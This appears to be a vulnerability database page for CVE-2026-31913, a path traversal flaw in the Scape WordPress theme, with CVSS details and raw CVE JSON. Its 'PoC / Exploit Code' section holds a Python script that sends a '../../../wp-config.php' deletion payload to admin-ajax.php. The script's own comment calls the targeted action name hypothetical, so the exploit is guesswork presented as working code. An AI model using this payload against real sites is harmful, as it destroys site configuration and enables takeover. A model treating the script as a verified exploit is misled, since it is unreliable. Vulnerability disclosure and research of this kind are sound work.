Security Vulnerability Report
中文
CVE-2026-31913 CVSS 8.6 HIGH

CVE-2026-31913

Published: 2026-03-25 17:16:59
Last Modified: 2026-04-24 16:35:20

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Whitebox-Studio Scape scape allows Path Traversal.This issue affects Scape: from n/a through < 1.5.16.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Whitebox-Studio Scape < 1.5.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_url): """ PoC for CVE-2026-31913: Path Traversal leading to Arbitrary File Deletion. Target: Whitebox-Studio Scape WordPress Theme < 1.5.16 """ # The vulnerable endpoint might be admin-ajax.php, common in plugin/theme vulns url = f"{target_url}/wp-admin/admin-ajax.php" # Payload aiming to delete wp-config.php using path traversal # Note: The specific action parameter 'scape_delete_file' is hypothetical based on the vulnerability nature payload = { 'action': 'scape_delete_file', 'file': '../../../wp-config.php' } try: response = requests.post(url, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Request sent to {url}") print(f"[+] Response: {response.text}") else: print(f"[-] Failed to send request. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with actual target exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31913", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:58.517", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Whitebox-Studio Scape scape allows Path Traversal.This issue affects Scape: from n/a through < 1.5.16."}, {"lang": "es", "value": "Vulnerabilidad de Limitación Inadecuada de un Nombre de Ruta a un Directorio Restringido ('Salto de Ruta') en Whitebox-Studio Scape scape permite el Salto de Ruta. Este problema afecta a Scape: desde n/d hasta &lt; 1.5.16."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/scape/vulnerability/wordpress-scape-theme-1-5-16-arbitrary-file-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}